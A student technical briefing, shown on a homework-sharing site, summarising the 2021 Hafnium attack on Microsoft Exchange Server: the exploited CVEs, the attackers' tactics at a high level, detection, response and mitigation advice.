Tech Briefing

docx

School

Collin County Community College District *

*We aren’t endorsed by this school

Course

2343

Subject

Information Systems

Date

Dec 6, 2023

Type

docx

Pages

5

Uploaded by ConstableIce18077

Report
ITSY 2330 Technical Briefing Write-Up Microsoft Exchange Server Hack March 2, 2021, the Microsoft Exchange Server was attacked via exploits on multiple zero-day vulnerabilities with over 30,000 organizations in the US impacted (Carlson, 2021). The Microsoft Exchange Server ranges from emails, calendars, and collaborations. The users ranged from massive corporations to small businesses worldwide. The attackers were shortly identified as a Chinese hacking group known as Hafnium and are described as highly skilled. Despite being from China the group uses various virtual private servers that are in the US to try and hide their real locations. Although Hafnium attacked first, they implemented malware allowing all sorts of hackers to gain administrative access to the victim’s systems. This cyberattack may have a significant impact on all sorts of organizations which will result in financial losses, trust issues, and tarnished reputation. A strong cyber-attack mitigation is an absolute must to neutralize and prevent any future attacks. Initial Access Hafnium used several combinations of social engineering and technical attacks to gain entry through the multiple zero-day exploits. These exploits will then allow the hackers to gain entry and target the system with all they got. Many customers were using online exchange which created the older landscape to be the most vulnerable. As they were running their business, they would be so focused and be more careless which resulted in Hafnium using phishing emails to trick users into leaking their logins thus gaining access into the server. Hafnium utilized tactics of
MITRE ATT&CK, they used 11 of the 14 techniques. According to Singh, they attacked the on- premises Exchange Server by exploiting these four key zero-day vulnerabilities, CVE-2021- 26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065. These vulnerabilities targeted older versions of Microsoft Exchange which are the 2013, 2016, and the 2019 version. Once the attackers gained entry, they were able to gather all sorts of sensitive data such as emails, contacts, calendar dates, and other information. This data could be used for even more attacks such as spear phishing and more social engineering attacks. Hafnium is a notable threat actor that targets many large entities so it wouldn’t be surprising if they strike again. Propagation Once Hafnium gained access to the Exchange, they used several techniques to move around the network. These techniques range from Reconnaissance, persistence, defense evasion, and lateral movement. Reconnaissance consists of tactics used for information gathering of the organization that is being targeted and used later to plan and launch the attack. In this circumstance, Hafnium only had to know whether the server was running on the target server and if so which one (Singh,2021). Persistence involves tactics where the enemy would keep their foot in the sever after it’s been attacked, and they won’t be locked out after the system restarts or it’s been interrupted. Hafnium used web shells and malware to force themselves to stay within the server despite suppressing them (Singh, 2021). They also utilized backdoors by creating a domain account and granting themselves administrator privileges to the account to make it easier for them when they attack in the future. Defense evasion is a method that avoids detection by security tools. Hafnium used techniques to use web shells and match locations and names to avoid detection by users or security mitigation tools (Singh,2021). Lateral Movement involved the enemies to take control of the system by roaming through the network. Hafnium used a
PSExec tool which is an actual windows tool but mostly used by threat actors that access and control remote systems (Singh, 2021). These are just a few of the techniques they used to enter the exchange server. The attackers using these tools were able to compromise many systems throughout the network which shot the attack to top priority and increase how much potential damage they may cause. Detection and Response to the attack Detecting the attack by Hafnium was not an easy task especially with them utilizing several techniques to lose the attention within the server they were in. The detection was handled by a wide variety of manual and automatic methods. They used endpoint detection and response tools such as crowd strike, security compliance manager, and most importantly the Microsoft baseline security analyzer. Using the security compliance manager would scan your exchange server for any irregularities and weakness which can help you increase your security effortlessly. The Microsoft baseline security analyzer was a mighty tool that aided Microsoft in releasing and downloading the updates to the specific versions of Microsoft exchange that were being targeted. Once the attack was identified, they took actions to minimize the spread of the malware and reset everyone who was affected passwords. Then collaborated with the incident response team to assess the scale of the attack and identify the affected systems. The government was also involved as the FBI gained court approval to remove the web shells that were specifically created as a backdoor for Hafnium. Afterwards, Microsoft told all the IT admins and users to apple fixes immediately as they continue to combat and left over backdoors. Then they established a plan to restore the affected systems and data. As the days went on Microsoft would release security updates of all sorts, especially for older and unsupported systems to mitigate any more
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
  • Access to all documents
  • Unlimited textbook solutions
  • 24/7 expert homework help
vulnerabilities. The plan was to prioritize all critical systems affected and find a way to restore the data that was stolen with backups. Conclusion After the attack was mitigated, a postmortem analysis was conducted which focused on the main areas to improve. Microsoft deemed 114 CVEs to be looked at and about 19 were deemed critical including 2 remote code execution vulnerabilities which was a way Hafnium entered the server (Carlson, 2021). Despite the code not being linked to the attacks, Microsoft suggests the vulnerabilities may escalate the risk of exploit code for new zero-day vulnerabilities. They suggested all their customers install the updates as soon as possible and even the CISA ordered all federal agencies to apply the updates as well. Despite all this we may see more future attacks but the best way to be careful about them is to routinely update your server, no weak passwords, be careful about phishing emails, and any other form of social engineering attacks.
References Carlson, B. (2021, May 6). The microsoft exchange server hack: A timeline . CSO Online. https://www.csoonline.com/article/3616699/the-microsoft-exchange-server-hack-a- timeline.html Singh, R. (2021, August 10). Techniques used by Hafnium to target Microsoft Exchange servers: Stellar . Stellar Data Recovery Blog. https://www.stellarinfo.com/blog/techniques-used-by- hafnium-to-target-exchange-servers/ Osborn, C. (n.d.). Everything you need to know about the microsoft exchange server hack . ZDNET. https://www.zdnet.com/article/everything-you-need-to-know-about-microsoft- exchange-server-hack/

Related Documents

Final Exam Risks Mngmnt.docx
Assignment 2 ITM210 Project Charter.docx
Case Two.pptx
W08 Tutorial Exercise.docx
Project Paper.docx
midterm essay.docx
Week 4 Lab 1.docx
Week 9-BigdataDataLakeDataWarehose.docx
JThomas_Clinical Documentation Worksheet_112623.docx
Email # 2 Bad News.docx
Quiz Technology in Counseling.pdf
4-2 Activity Critical Analysis Reimagine_Alexi Heiney.docx